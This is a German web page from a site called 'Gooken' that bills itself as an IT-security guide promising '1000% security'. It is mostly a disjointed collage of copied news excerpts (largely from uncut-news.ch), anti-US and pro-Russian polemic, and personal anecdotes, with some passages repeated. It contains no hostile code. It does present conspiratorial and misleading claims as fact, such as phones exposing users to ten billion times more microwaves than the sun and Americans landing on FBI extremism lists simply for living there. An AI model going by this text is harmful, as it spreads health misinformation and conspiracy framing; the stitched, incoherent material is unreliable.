Gooken liefert Ihnen eine Suchmaschine und den uneingeschränkten 1000%-sicheren Lifetime-Computer! Chefsache IT-Sicherheit, bitte beachten Sie: Sie müssen zur Erlangung 1000%-iger Sicherheit für Ihren Computer manch Arbeiten erledigen! Dieser Exkurs sollte daher vor allem auf Ihrem PC (Computer) laufen, da er neben dem Abschnitt für Smartphone vor allem den PC abhandelt ( auch wenn mans mit dem Smartphone immer noch probieren kann...) !
Außerdem: Ihr Smartphone-Browser ist fehlerbehaftet, indem er die Webseite nicht in den Bildschitrm füllender voller Breite 100% darstellt? Zweimal kurz rechts auf die Freifläche neben der Webseite tippen... Schritt 1 - Informatik und Gesellschaft - IT-Sicherheit / Angewandte Sicherheit in der Informationstechnik - Informatik und Gesellschaft - Mehrfachvorsorge - das Basisniveau - ein Report von Gooken, der Internet-Suchmachine Gooken - das (zeitweise) brechend volle große "China-Restaurant"... Möchten auch Sie den ersehnten Frieden mit dem Computer schließen, das System finden, das mausklick-schnell läuft, alles umfasst und außerdem die unglaublich hohe Sicherheit bietet? Wenn Ihnen unsere Projekte gefallen, dann freuen wir uns über Ihren Support! Um die zugehörige Bankverbindung von Gooken zu erfahren, klicken Sie bitte hier! Spenden sie an Gooken mit PayPal.me durch Klicken auf PayPal: Spend or pay Gooken by PayPal.me / Spende oder Zahlung an Gooken über PayPal.me : Pay by Paypal.me: Bitte hier klicken! Alternativ Spende per Bankverbindung oder kontaktieren Sie uns: Die Projekte von Gooken stehen zum Sonderpreis für ein paar Septrillionen nach Vereinbarung zum Verkauf an (Stand: 2010), Einzelheiten siehe im Menü links unter Impressum Gooken: 1000% IT-Sicherheit: Folgen Sie auf Gookens Webseiten einfach diesen grünen Häkchen! Gooken-Exkurs: Interne Links |
Gooken: unabhängig - unparteiisch - tatsachengetreu - meinungsfreudig Gooken: (Meta und lokale) Suchmaschine, Online Exkurs "IT Sicherheit / Informatik und Gesellschaft", News&,Links So sind wir nun mal. Auf unseren Webseiten veröffentlichte Berichte müssen nicht unserer Ansicht und Meinung entsprechen. Wir gehen entweder von Tatsachengetreue aus oder stellen sie Ihnen als Leser gegenüber lediglich zur Dispostion in den Raum. Allein, um nicht nur der Vergangenheit, sondern auch dem allgemeinen Pioniergeist gleichzukommen, bedarfs als letzten Punkt auch unserer Meinungsfreudigkeit., Anm., Gooken, die Red, 2017, 2024 USA/Das Imperium Datenerfassungszentren, KI Im Grunde genommen werden Sie verschwinden Alles, was Sie tun müssen, um als verdächtige Person eingestuft, zur Überwachung markiert und schließlich auf eine Überwachungsliste der Regierung gesetzt zu werden, ist in den Vereinigten Staaten zu leben Watchlisted: Wahrscheinlich stehen Sie schon auf einer Extremismusliste der Regierung, T.H.G., uncut-news.ch, 29.01.2024 Von Tyler Durden Verfasst von John & Nisha Whitehead über das Rutherford Institute "In einer geschlossenen Gesellschaft, in der jeder schuldig ist, ist das einzige Verbrechen, erwischt zu werden." Hunter S. Thompson Dem FBI zufolge sind Sie möglicherweise ein Anti-Regierungs-Extremist, wenn Sie: a) eine Bibel oder andere religiöse Materialien gekauft haben, b) Begriffe wie "MAGA" und "Trump" verwendet haben, c) bei Dick´s Sporting Goods, Cabela´s oder Bass Pro Shops eingekauft haben, d) Tickets für Reisen mit dem Bus, Auto oder Flugzeug gekauft haben, e) alle der oben genannten Punkte. Wenn Sie in den letzten Jahren eine dieser Optionen gewählt haben, stehen Sie wahrscheinlich bereits auf einer Beobachtungsliste der Regierung. So weit ist das Netz der Regierung bei der Verfolgung von Extremisten im Inland gespannt. Wir sind jetzt alle Freiwild, leichte Ziele für die Aufnahme in die eine oder andere FBI-Beobachtungsliste. Wenn das FBI Banken und andere Finanzinstitute auffordert, stichprobenartig Untersuchungen bei Kundentransaktionen durchzuführen - ohne Berechtigung und ohne wahrscheinlichen Grund - nach "Extremismus"-Indikatoren, die im Großen und Ganzen darauf basieren, wo Sie einkaufen, was Sie lesen und wie Sie reisen, dann sind wir das alle in Schwierigkeiten. Natürlich müssen Sie nichts Illegales tun. Sie müssen nicht einmal die Autorität der Regierung in Frage stellen. Offen gesagt, Sie müssen sich nicht einmal für Politik interessieren oder etwas über Ihre Rechte wissen. Alles, was Sie tun müssen, um als verdächtige Person eingestuft, zur Überwachung markiert und schließlich auf eine Überwachungsliste der Regierung gesetzt zu werden, ist in den Vereinigten Staaten zu leben. So einfach ist es, mit den vielen roten Fahnen der Regierung in Konflikt zu geraten. Um auf einer Überwachungsliste der Regierung zu landen oder einer verschärften Kontrolle unterworfen zu werden, muss man heutzutage nur bestimmte Auslösewörter (wie Wolke, Schwein und Piraten) verwenden, im Internet surfen, mit einem Mobiltelefon kommunizieren, hinken oder stottern, Auto fahren, in einem Hotel wohnen, an einer politischen Kundgebung teilnehmen, sich in den sozialen Medien äußern, psychisch krank erscheinen, im Militär dienen, einem Strafverfolgungsbeamten widersprechen, sich bei der Arbeit krank melden, Material in einem Baumarkt kaufen, Flug- oder Bootsfahrunterricht nehmen, verdächtig erscheinen, verwirrt oder nervös wirken, zappeln oder pfeifen oder schlecht riechen, in der Öffentlichkeit mit einer Spielzeugwaffe oder etwas, das einer Waffe auch nur im Entferntesten ähnelt (z. B. einer Wasserdüse oder einer Fernbedienung oder einem Gehstock), einen Polizeibeamten anstarren, die Autorität der Regierung in Frage stellen oder den Anschein erwecken, für Waffen oder die Freiheit zu sein. Wir gelten jetzt alle als schuldig, bis unsere Unschuld bewiesen ist. Es ist nur eine Frage der Zeit, bis Sie zu Unrecht beschuldigt werden und von der Polizei auf der Grundlage eines datengesteuerten Algorithmus oder einer Risikobewertung, die von einem mit künstlicher Intelligenz betriebenen Computerprogramm erstellt wurde, untersucht und konfrontiert werden. [...] Um auf einer Überwachungsliste der Regierung zu landen oder einer verschärften Kontrolle unterworfen zu werden, muss man heutzutage nur bestimmte Auslösewörter (wie Wolke, Schwein und Piraten) verwenden, im Internet surfen, mit einem Mobiltelefon kommunizieren, hinken oder stottern, Auto fahren, in einem Hotel wohnen, an einer politischen Kundgebung teilnehmen, sich in den sozialen Medien äußern, psychisch krank erscheinen, im Militär dienen, einem Strafverfolgungsbeamten widersprechen, sich bei der Arbeit krank melden, Material in einem Baumarkt kaufen, Flug- oder Bootsfahrunterricht nehmen, verdächtig erscheinen, verwirrt oder nervös wirken, zappeln oder pfeifen oder schlecht riechen, in der Öffentlichkeit mit einer Spielzeugwaffe oder etwas, das einer Waffe auch nur im Entferntesten ähnelt (z. B. einer Wasserdüse oder einer Fernbedienung oder einem Gehstock), einen Polizeibeamten anstarren, die Autorität der Regierung in Frage stellen oder den Anschein erwecken, für Waffen oder die Freiheit zu sein. Wir gelten jetzt alle als schuldig, bis unsere Unschuld bewiesen ist. Es ist nur eine Frage der Zeit, bis Sie zu Unrecht beschuldigt werden und von der Polizei auf der Grundlage eines datengesteuerten Algorithmus oder einer Risikobewertung, die von einem mit künstlicher Intelligenz betriebenen Computerprogramm erstellt wurde, untersucht und konfrontiert werden. [...] Entscheidend wird sein, was die Regierung - oder wer auch immer gerade das Sagen hat - denkt. Und wenn die Machthaber der Meinung sind, dass Sie eine Bedrohung für die Nation sind und eingesperrt werden sollten, dann werden Sie eingesperrt und haben keinen Zugang zu den Schutzmaßnahmen, die unsere Verfassung vorsieht. Im Grunde genommen werden Sie verschwinden. Quelle: https://www.zerohedge.com/political/watchlisted-youre-probably-already-government-extremism-list https://uncutnews.ch/watchlisted-wahrscheinlich-stehen-sie-schon-auf-einer-extremismusliste-der-regierung/ Computertechnik-Mobiltelefon Die gefährlichste Technologie, die jemals erfunden wurde - Teil II, Artur Firstenberg @ uncut-news.ch, 31.10.2021 [...] Die größte Lüge ist, dass es sich hierbei um "stromsparende" Geräte handelt, und dass; sie deshalb sicher sind. Das ist eine doppelte Lüge. Es ist eine Lüge, weil sie nicht stromsparend sind. Wenn Sie ein Mobiltelefon - egal welches - in der Hand oder an Ihren Körper halten, werden Sie von Ihrem Telefon mit mehr Mikrowellen bestrahlt als von jedem Mobilfunkmast und mit zehn Milliarden Mal mehr als von der Sonne, der Milchstraße oder anderen natürlichen Quellen. Die von der Federal Communications Commission* festgelegten Expositionsrichtlinien spiegeln diese Realität wider: Mobilfunkmasten dürfen Ihren Körper mit einer festgelegten Absorptionsrate von 0,08 Watt pro Kilogramm belasten, während Mobiltelefone Ihr Gehirn mit einer spezifischen Absorptionsrate von 1,6 Watt pro Kilogramm belasten dürfen, was dem Zwanzigfachen dessen entspricht. https://uncutnews.ch/die-gefaehrlichste-technologie-die-jemals-erfunden-wurde-teil-ii/ Diese größenwahnsinnigen Technokraten sind dabei, die Erde und den Weltraum zu zerstören, uncut-news.ch, 04.10.2023 Elon Musk könnte mit Leichtigkeit die Erde und den Weltraum zerstören, aber wenn man andere wie Jeff Bezos und Richard Branson dazu nimmt, hat man ein Rezept für die totale Katastrophe. Ein Beobachter: "Man muss die Abwesenheit von Kontrolle lieben, die es Größenwahnsinnigen erlaubt, den Planeten für alle zu ruinieren". - TN-Redakteur Quelle: https://www.technocracy.news/these-megalomaniac-technocrats-are-on-course-to-wreck-earth-and-outer-space/ https://uncutnews.ch/diese-groessenwahnsinnigen-technokraten-sind-dabei-die-erde-und-den-weltraum-zu-zerstoeren/ rC3: Cory Doctorow warnt vor "digitalen Äquivalenten der Atombombe", trojaner-info.de, 03.01.2020 Der Science-Fiction-Autor Cory Doctorow hat auf dem remote Chaos Communication Congress (rC3) am Sonntag schärfere kartellrechtliche Vorgaben insbesondere für interoperable Online-Dienste gefordert, um den Wettbewerb im digitalen Zeitalter zu erhalten. Mit den fünf Größen des US-Überwachungskapitalismus - Google, Amazon, Facebook, Apple und Microsoft (GAFAM) - seien "die schlimmsten Albträume" der frühen Verfechter von Bürgerrechten im Internet wahr geworden. Ein politisches und rechtliches Gegensteuern sei daher überfällig. https://www.trojaner-info.de/daten-sichern-verschluesseln/aktuelles/rc3-cory-doctorow-warnt-vor-digitalen-aequivalenten-der-atombombe-8145.html Neben dem Atomkrieg ist die digitale Revolution die größte Katastrophe für die Menschheit, uncut-news.ch, 24.07.2024 Paul Craig Roberts Mir war von Anfang an klar, dass die digitale Revolution eine riesige Katastrophe ist, die sich anbahnt. Die digitale Revolution ist in jeder Hinsicht eine Katastrophe. Sie ermöglicht Regierungen nicht nur, eine Tyrannei jenseits der Vorstellungskraft von George Orwell zu errichten, sie unterwirft alles gesammelte Wissen einem elektromagnetischen Impuls und führt zum Stillstand der globalen Wirtschaftstätigkeit aufgrund eines Fehlers in der Cybersicherheitssoftware. Quelle: https://www.paulcraigroberts.org/2024/07/21/other-than-nuclear-war-the-digital-revolution-is-mankinds-greatest-disaster/ https://uncutnews.ch/neben-dem-atomkrieg-ist-die-digitale-revolution-die-groesste-katastrophe-fuer-die-menschheit/ Künstliche Intelligenz: Der Weltuntergang ist garantiert, uncut-news.ch, 10.05.2024 Alexander Dugin Alexander Dugin sieht Russlands Kampf gegen KI und den globalen Kapitalismus als Kampf gegen eine apokalyptische Transformation der Welt. Um zur Vorherrschaft der Künstlichen Intelligenz (KI) überzugehen, müsse man sich die Menschheit selbst als einen riesigen Computer vorstellen, dessen Komponenten jedoch nicht perfekt funktionieren. Materialismus, Nominalismus, Evolutionismus, analytische Philosophie (auf der Grundlage des logischen Positivismus) und Technokratie bereiten die theoretischen Grundlagen vor, die durch Wissenschaft, Bildung und Kultur verbreitet und umgesetzt werden. [...] Die Aufgabe der Russen besteht darin, die Cyber-Realität zu überwinden. Es wird kaum möglich sein, ihr auszuweichen. Es wird notwendig sein, den Tiger zu reiten und Gift in Medizin zu verwandeln. Die russische Idee muss sich durchsetzen und nicht nur die Ukraine, sondern auch die künstliche Intelligenz besiegen. So viel steht auf dem Spiel. (1). Die Regionen Donezk und Lugansk. Quelle: Artificial Intelligence: The End of the World Guaranteed, https://www.arktosjournal.com/p/artificial-intelligence-the-end-of https://uncutnews.ch/kuenstliche-intelligenz-der-weltuntergang-ist-garantiert/ Die digitale Revolution war ein verhängnisvoller Irrtum, uncut-news.ch, 28.10.2024 Paul Craig Roberts [...] Doch die größte Bedrohung liegt darin, dass das FBI und andere Polizeibehörden gefälschte Bilder erstellen könnten, die Sie bei Straftaten oder sogar beim Sex mit Minderjährigen zeigen. Ihre Stimme kann aufgezeichnet und synchronisiert werden, sodass Ihre Lippen zu Worten bewegt werden, die Ihnen in den Mund gelegt werden. Das bedeutet, dass in der digitalen Welt nicht nur Ihr Bankkonto, Ihre Anlagen und Ihre E-Mails gehackt und unsicher sind – es können auch belastende Beweise gegen Sie konstruiert werden. Ein weiteres Opfer der digitalen Revolution ist der Kundendienst. Denken Sie daran, wie schwierig es ist, einen Kundendienstmitarbeiter zu erreichen, und wie schwierig es ist, ein Problem zu lösen. Denken Sie an die zunehmenden Genehmigungen, die Sie durchlaufen müssen, da die Dienstanbieter in dem sinnlosen Bemühen, ein von Natur aus unsicheres System sicher zu machen, weitere Sicherheitsstufen hinzufügen. Betrachten Sie die Frustration, den Stress und die verschwendete Zeit. In der analogen Zeit konnte ein Telefonanruf die Situation in wenigen Minuten lösen. Jetzt kann die Behebung eines Problems Stunden, ja sogar Tage dauern. Es ist erstaunlich, dass die Menschen so dumm waren, die digitale Revolution für eine gute Sache zu halten. Die digitale Revolution ist unvereinbar mit Sicherheit und Freiheit. Die digitale Revolution ermöglicht Tyrannei. Warum wurde sie uns aufgezwungen? Die digitale Revolution hat sogar Ihren Staubsauger unzuverlässig gemacht. Quelle: The Digital Revolution Was a Disastrous Mistake, https://www.paulcraigroberts.org/2024/10/23/the-digital-revolution-was-a-disastrous-mistake-2/ https://uncutnews.ch/die-digitale-revolution-war-ein-verhaengnisvoller-irrtum/ Wiretaps Exposed: Wie Verschlüsselungs-Hintertüren den Hackern Tür und Tor öffnen, uncut-news.ch, 28.10.2024 reclaimthenet Geheimdienste/NSA/Überwachung/BigData [...] Einmal untergraben und gebrochen, dienen Verschlüsselungs-Hintertüren jedem, der schlau genug ist, sie zu benutzen – und das schließt eindeutig nicht nur eine Regierung oder Regierungshacker im Allgemeinen ein. Die Einsätze: Jenseits privater Kommunikation Und nicht nur private Nachrichten, Chats und dergleichen sind von einer starken und zuverlässigen Verschlüsselung abhängig, sondern auch Bankkonten, Unternehmen und damit die Existenzgrundlage. Dennoch arbeiten viele Regierungen auf der ganzen Welt sehr hart daran, die Verschlüsselung auszuhöhlen, um das oft rein politische Bedürfnis zu befriedigen, jederzeit Zugang zu jedermanns Kommunikation zu haben – und verstecken dies hinter dem Deckmantel einer angeblichen Voraussetzung für die Strafverfolgung, um mit Dingen wie Terrorismus und Kindesmissbrauch umgehen zu können -, so wie sie heute ist. [...] Die Geschichte ist auch eine gute Erinnerung daran, wie Abhörsysteme für Telekommunikations- und Internetanbieter in den USA funktionieren. Das 1994 verabschiedete Gesetz zur Unterstützung der Strafverfolgung (Communications Assistance for Law Enforcement Act, CALEA) ermöglichte es den Strafverfolgungsbehörden, der damals aufstrebenden Mobiltelefonbranche abzuhören. Und nun scheint jemand diese ohne richterliche Anordnung abgehört zu haben – zumindest ohne eine solche, die von US-Gerichten ausgestellt wurde. CALEA soll die „Erleichterung der Weitergabe von Kundendaten an (US-) Strafverfolgungsbehörden und Regierungen“ ermöglichen. Das bedeutet, dass Internet- und Telekommunikationsanbieter Zugang zu den Daten ihrer Kunden haben, bis zum Datenverkehr und zum Browserverlauf, und dass diese Daten, wenn sie angefordert werden, an – nun ja, die Gesetzeshüter gehen. Dies ist ein weiteres dieser Gesetze, die vor Jahrzehnten erlassen wurden, in den Anfängen dessen, was wir heute als Internet kennen, und des Netzes von Diensten und Plattformen, die sich schnell darauf ausgebreitet haben. Lassen Sie uns eines klarstellen. In dem Moment, in dem man eine Hintertür in die Verschlüsselung einbaut, könnte man genauso gut jedem Hacker, Schurkenstaat und gelangweilten Teenager mit einem Laptop und einem Groll die Schlüssel in die Hand drücken. Die Idee, dass eine Hintertür nur für die „Guten“ gebaut werden könnte, ist so wertvoll, dass sie in Gold gerahmt und auf Etsy als Retro-Relikt politischer Naivität verkauft werden sollte. Die Geschichte lehrt uns, was passiert, wenn man die falsche Tür öffnet – jeder kommt hereinspaziert. Erinnern Sie sich, als 2017 die Hacking-Tools der NSA „versehentlich“ durchsickerten? Dieses kleine Missgeschick löste eine weltweite Welle von Ransomware-Angriffen aus, die Krankenhäuser, Unternehmen und Regierungen gleichermaßen lahmlegten. Wenn die bestfinanzierte Spionagebehörde der Welt ihr Spielzeug nicht unter Verschluss halten kann, wie genau soll dann diese Hintertür nur für „autorisiertes Personal“ zugänglich sein? Quelle: https://reclaimthenet.org/wiretaps-exposed-how-encryption-backdoors-open-the-floodgates-for-hackers https://uncutnews.ch/wiretaps-exposed-wie-verschluesselungs-hintertueren-den-hackern-tuer-und-tor-oeffnen/ Nächsten Hyperlink beachten (!!!), Anm., Gooken, die Red. : Onlinehändler Temu unterschreibt Unterlassungserklärung, spiegel.de Wegen manipulativen Designs und irreführender Rabatthöhen wurde die Shopping-App Temu von der Verbraucherzentrale abgemahnt. Künftig will der Billiganbieter auf derartige Tricks verzichten. https://metager.de/partner/r?link=https%3A%2F%2Fwww.spiegel.de%2Fwirtschaft%2Funternehmen %2Ftemu-onlinehaendler-unterschreibt- unterlassungserklaerung-verzicht-auf-irrefuehrende-tricks-a-ab23def5-8ac9-471f-889a-9ab459fd2786&affillink=https%3A%2F%2Ftatrck.com%2F redir%2FclickGate.php%3Fu%3Du68EH62H%26p%3DbnV328d8N7%26m%3D30%26url%3Dhttps%253A%252F%252Fwww.spiegel.de%252F wirtschaft%252Funternehmen%252Ftemu-onlinehaendler-unterschreibt-unterlassungserklaerung-verzicht-auf-irrefuehrende-tricks-a-ab23def5-8ac9-471f-889a-9ab459fd2786%26s%3D metager_de&password=7fdf508b5cdb46c3a6fb7b873982c22143c5e01d21bfb0d743d3d35e92f5617a Gooken zu einem ehemaligen Schulkamerad (und UNIDO-Informatik-Zweitsemester-Studiengang-Abbrecher mit abermals vorü,bergehendem Umstieg auf Chemietechnik) Steffen M. aus nun Hamburg, Google-DeepL-Hilfsprogrammierer, am 20.06.2024 auf WhatsApp: "Schrecklich! Arbeitest du immer noch in der Computerbranche?" Er schickte uns kurz vorher mit kurzen Texteingaben KI-computererstellte Bilder von einem die ganze Welt zerstörenden Riesenmonster, an dessem Programm er arbeite. Sowas fand er irre praktisch. Dabei probierte er sich vorher noch zwischenzeitlich als Hilfsaltenpfleger (wie lobenswert), kehrte nach angeblich schlechten Erfahrungen aber wieder zur Technik zurück. Sein Vater ging früh die 80er Jahre mit seinem Prozellanladen in Konkurs. Seitdem kennt er und sein großer Bruder noch heute - trotz Studienabbruch und Linux - nur Computer - und - trotz Fernost - Elektrotechnik. Das gelingt nur verlässlich mit hohen anerkannten Standards Notfallrettung versagt in vielen Regionen Deutschlands,tagesschau.de, 16.07.2024 In Notfällen sind die Überlebenschancen in Deutschland regional sehr unterschiedlich. Ein Grund dafür sind große Qualitätsunterschiede in der Notfallrettung. Von J. Russezki, M. Krämer, P. Hünerfeld und L. Kube. [...] Ein Schwachpunkt sind die Rettungsleitstellen. Sie müssen schnell einen Herz-Kreislauf-Stillstand erkennen, Rettungsdienst und Ersthelfer alarmieren und am Telefon zur Herzdruckmassage anleiten. Das gelingt nur verlässlich mit hohen anerkannten Standards. https://www.tagesschau.de/wissen/gesundheit/notfallrettung-100.html Lesermeinung Gooken Auch schon gemerkt? So langsam kommen sie dahinter... "Lieber blau als grau..." "Was sollen wir machen? Volk wählt die Mafia", meinte ein Feuerwehrmann, ein Brandschutzmeister, zu uns (mir) die 80er Jahre. "Weil wir so gierig sind", gesteht ein westdeutscher Bankier einer damals noch renommiert geltenden Bank in einem der folgenden Berichte. Gehen wir all dem doch gemeinsam mit möglichst aktuellem Bezug allerbester Quellen einfach nach wie insbesonders tagesschau.de, ferner netzpolitik.org, FOCUS Online, Spiegel Online, "die Zeit", "SZ" bzw. PCWelt und Chip.de usw. . Neuer Höchstwert durch Waldbrände Bislang 660.000 Hektar in Europa verbrannt, tagesschau.de, 14.08.2022 Noch immer lodern in Europa verheerende Waldbrände und hinterlassen verkohlte Landschaften. In diesem Jahr sind bereits 660.000 Hektar Land verbrannt - ein neuer Höchstwert. Dabei ist die Brandsaison noch lange nicht vorbei. Durch die verschiedenen Großfeuer in Europa sind in diesem Jahr bereits rund 660.000 Hektar Land verbrannt - der höchste Wert seit Beginn der Aufzeichnungen im Jahr 2006. https://www.tagesschau.de/ausland/europa/waldbrand-europa-rekord-hitze-klima-101.html Umsagter Feuerwehrmann verlor Jahre spä,ter beide Beine. Angeblich Raucherbeine, Anm., Gooken. Im Westen Nix Niue ( Motto zum Sturz des Schaah von Persien (1982) verdeckt (eigentlich) überall auch bei uns in Deutschland ( beachte auch das letzte Interview mit dem freien Reporter und Verfechter der Mauer durch Deutschland Scholl-Latur mit dem Gerede vom derzeit für Deutschland und Europa derzeit immer noch unverzichtbaren "lästigen" Außenseitern wie USA und UK ): Ingo Maus (wahrscheinlich V-Mann, Anm., Gooken) meint zum Thema "Adobe Security Updates und Fracking": auf FOCUS Online 2015 das, was wir schon zum Sturz des Schaahs usw. 1986 im Fernsehen vernommen haben: "Everything from Ami is evil bad. Ami go home!!! / Alles vom Ami ist mist. Ami go home!!!". Die wievielte Stimme war das eigentlich schon? Wir, Gooken, hören das über USA nicht zum ersten Mal ... Außer son bisschen Rock- und Popmusik 60er bis alte 80er-Jahre kommen viele da (mit USA) einfach nicht mehr mit ! Passage von Stefan Klein von heut bin ich extrabreit aus dem Jahr 1986: "Amis zwingen uns zum Kaufen, all den Schrott, den wir nicht brauchen." Der Arbeits - und Kaufzwang der USA solle aber (neben Schul- und Wehrpflicht und vielen weiteren Pflichten) nur indirekt bestehen, meinte eine US-Amerikanerin früher (die 80er Jahre) mal zu mir in einer Reisegruppe vor Zeugen. Insbesonders Prostitution aber sei für USA ein echtes Problem. Die Gruppe pflichtete bei, "Yeeee...s." "Mehr Respekt vor einem Altenpfleger als allen Industrie-Bossen zusammen", eine Maja Schmidt im Jahr 2021 ... "Jeder Altenpfleger leistet mehr für die Gesellschaft als alle Investmentbanker zusammen." Der Irrsinn dieser Welt: Untergang der Mächtigen: Atomkraftwerke, Waffendeals, Umweltverschmutzung, Korruption, Lobbyismus, ...: Die herrschende Klasse riecht ihren nahenden Untergang - und will noch rasch möglichst viel Unheil anrichten, Kolumne, Spiegel Online, 24.08.2015 All people confident with the 80th know, that USA is a criminal state, who takes his superiority ... / Allen mit der Geschichte der vergangenen 80er Jahre vertrauten denkenden Menschen ist doch bekannt, dass die USA ein verbrecherischer Staat ist, der seine Übermacht mit ..." www.compact-online.de/us-strategie-weltpolizei-oder-beobachtender-raushalter Die "europäischen Führer" sind bereit, ihren eigenen Kontinent zu zerstören, um ihren amerikanischen Herren zu gefallen Nach Frankreich: Niederlande zu Truppenentsendung in die Ukraine bereit, uncut-news.ch, 29.02.2024 dissident.one Krieg/Kriegsverbrechen/Militär/Armee/Rüstung Der Befehlshaber der niederländischen Streitkräfte, Onno Eichelsheim, schließt die Entsendung niederländischer Truppen nicht aus. Nach Frankreich sind auch die Niederlande bereit, Truppen in die Ukraine zu entsenden. "Ich denke, wir sollten keine Option ausschließen, um zu sehen, wie wir die Ukraine am besten unterstützen können", sagte Onno Eichelsheim. Er betonte, dass die Entsendung von Truppen in die Ukraine eine "letzte Option" sei. Nederland bereid om troepen te sturen naar Oekraïne. https://t.co/w5zHRRwvxj — Thierry Baudet (@thierrybaudet) February 28, 2024 Diese Gedanken sind für niederländische Generäle nicht neu. Der ehemalige Befehlshaber der Streitkräfte, Rob Bauer, der im Juni 2021 zum Vorsitzenden des NATO-Militärausschusses ernannt wurde, erklärte im Januar dieses Jahres, dass "die NATO zu einer direkten Konfrontation mit Russland bereit ist". Glauben diese Leute, dass, wenn die mickrigen Niederlande die Großmacht Russland angreifen, Russland im Gegenzug nichts tun wird? Für wen halten die sich eigentlich? Die "europäischen Führer" sind bereit, ihren eigenen Kontinent zu zerstören, um ihren amerikanischen Herren zu gefallen. Quelle: https://dissident.one/nederland-bereid-om-troepen-te-sturen-naar-oekraine https://uncutnews.ch/nach-frankreich-niederlande-zu-truppenentsendung-in-die-ukraine-bereit/ Focus, August 2014: Die ehemalige ARD-Tagesschau-Sprecherin Eva Hermann bloggt für den russischen Sender "Voice of Russia". In ihrem neuesten Beitrag erklärt sie, warum ein Krieg zwischen den Großmächten USA und Russland unausweichlich sei. Ihre Begründung: "Sie brauchen unbedingt Geld - und dafür werden sie alles tun. Bankrotte USA reizen Russland so lange, bis es zum Krieg kommt.", hier klicken Aus seiner (Reagans´) Welt der hungernden Bankdirektoren und weinenden Gerichtsvollzieher (-> Rio Reiser, 80er Jahre) Der Bauernkrieg seit der Reformation durch Martin Luther Inflationär, steuerbefreit, subventioniert, ... während der Russen-Discounter usw. hier immer noch auf sich warten lässt: Zu keinerlei Entgegenkommen bereit: die Bauern in Deutschland ... and if, such decades ago, even my own mother meant... / ... und wenn vor Jahrzehnten sogar die eigene Mutter zum Thema Maja Schmidt schon meinte ( ist das aber fertig: die eigene Mutter dann auch noch, das kriegt ihr aber wieder...!): "We are no present-give-away-institution for the Germans and no social station of the USA. / Wir sind keine Verschenkanstalt (Deutschland, Reagans Westen alias ( das vermeintliche ) Judas Judäa) der Deutschen und keine Sozialstation der USA (Asoziale) !", dann frage ich mich ( schau an: Die eigene Mutter meinte das allein aus sich heraus sogar, echt Seltenheitswert, da denkt man, das gibts doch wohl gar nicht, die eigene Mutter auch noch ... ), ob und inwiefern das eigentlich nicht stimmt. Up to now she uses neither smartphone nor computer: This is the best, one can do (if possible). It´s so ridiculous. How right she is ! 1981, 1982, 1983: Der Elefant macht ernst! Inmitten auf dieser ach so verratenen und verkauften Welt: Clever und Smart, USA, N.Y., 1983:Null Problemo: "If you do not know, how to go on, you have two possibilities: either you explode, or you cry for help. / Wenn man nicht mehr weiter weiß, hat man zwei Möglichkeiten: entweder man explodiert oder schreit nach Hilfe" (Magnum, TV-Serie, Januar 2016). Computertechnik-Mobiltelefon Die gefährlichste Technologie, die jemals erfunden wurde - Teil II, Artur Firstenberg @ uncut-news.ch, 31.10.2021 [...] Die größte Lüge ist, dass es sich hierbei um "stromsparende" Geräte handelt, und dass; sie deshalb sicher sind. Das ist eine doppelte Lüge. Es ist eine Lüge, weil sie nicht stromsparend sind. Wenn Sie ein Mobiltelefon - egal welches - in der Hand oder an Ihren Körper halten, werden Sie von Ihrem Telefon mit mehr Mikrowellen bestrahlt als von jedem Mobilfunkmast und mit zehn Milliarden Mal mehr als von der Sonne, der Milchstraße oder anderen natürlichen Quellen. Die von der Federal Communications Commission* festgelegten Expositionsrichtlinien spiegeln diese Realität wider: Mobilfunkmasten dürfen Ihren Körper mit einer festgelegten Absorptionsrate von 0,08 Watt pro Kilogramm belasten, während Mobiltelefone Ihr Gehirn mit einer spezifischen Absorptionsrate von 1,6 Watt pro Kilogramm belasten dürfen, was dem Zwanzigfachen dessen entspricht. https://uncutnews.ch/die-gefaehrlichste-technologie-die-jemals-erfunden-wurde-teil-ii/ rC3: Cory Doctorow warnt vor "digitalen Äquivalenten der Atombombe", trojaner-info.de, 03.01.2020 Der Science-Fiction-Autor Cory Doctorow hat auf dem remote Chaos Communication Congress (rC3) am Sonntag schärfere kartellrechtliche Vorgaben insbesondere für interoperable Online-Dienste gefordert, um den Wettbewerb im digitalen Zeitalter zu erhalten. Mit den fünf Größen des US-Überwachungskapitalismus - Google, Amazon, Facebook, Apple und Microsoft (GAFAM) - seien "die schlimmsten Albträume" der frühen Verfechter von Bürgerrechten im Internet wahr geworden. Ein politisches und rechtliches Gegensteuern sei daher überfällig. https://www.trojaner-info.de/daten-sichern-verschluesseln/aktuelles/rc3-cory-doctorow-warnt-vor-digitalen-aequivalenten-der-atombombe-8145.html Diese größenwahnsinnigen Technokraten sind dabei, die Erde und den Weltraum zu zerstören, uncut-news.ch, 04.10.2023 Elon Musk könnte mit Leichtigkeit die Erde und den Weltraum zerstören, aber wenn man andere wie Jeff Bezos und Richard Branson dazu nimmt, hat man ein Rezept für die totale Katastrophe. Ein Beobachter: "Man muss die Abwesenheit von Kontrolle lieben, die es Größenwahnsinnigen erlaubt, den Planeten für alle zu ruinieren". - TN-Redakteur Quelle: https://www.technocracy.news/these-megalomaniac-technocrats-are-on-course-to-wreck-earth-and-outer-space/ https://uncutnews.ch/diese-groessenwahnsinnigen-technokraten-sind-dabei-die-erde-und-den-weltraum-zu-zerstoeren/ Die Technologie als Tyrann: Ein Blick in eine dystopische Welt der Technokratie, uncut-news.ch, 03.04.2024 Technokratie und Transhumanismus teilen eine gemeinsame Überzeugung, einen verwandten Geist, wenn man so will. Dieser Glaube besagt, dass Wissenschaft und Technologie nicht nur Werkzeuge oder Annehmlichkeiten sind, sondern vielmehr die Grundpfeiler einer utopischen Zukunft, einer perfekten Gesellschaft. Quelle: https://human-level.ai/technology-as-tyrant-a-glimpse-into-a-dystopian-technocratic-world/ https://uncutnews.ch/die-technologie-als-tyrann-ein-blick-in-eine-dystopische-welt-der-technokratie/ 07.09.2013: Tagesschau reports about weak-points in many security software. The industry for software would have been built-in backdoors in their programs. It were possible to get information right before a user encrypts them and to send them over the internet. Super-computer were constructed to crack encrypted codes. NSA-program "Bullrun" belonged to the most kept secrets. The british agency GCHQ were very successfull in cracking code. Such analyses would have belonged to Google, Yahoo, Facebook und Microsoft. Tester im Jahr 2016: Rund 5500 Verbindungsversuche pro Tag von MS Windows 10 ins Internet In wenigen Stunden schnell mehrere hundert Kontakte zu Internetservern Windows-Datenschutz auf BSI-Level - so gehts, PC-WELT.de, 17.04.2019 Seit der Einführung von Windows 10 wird das Betriebssystem für seinen mangelnden 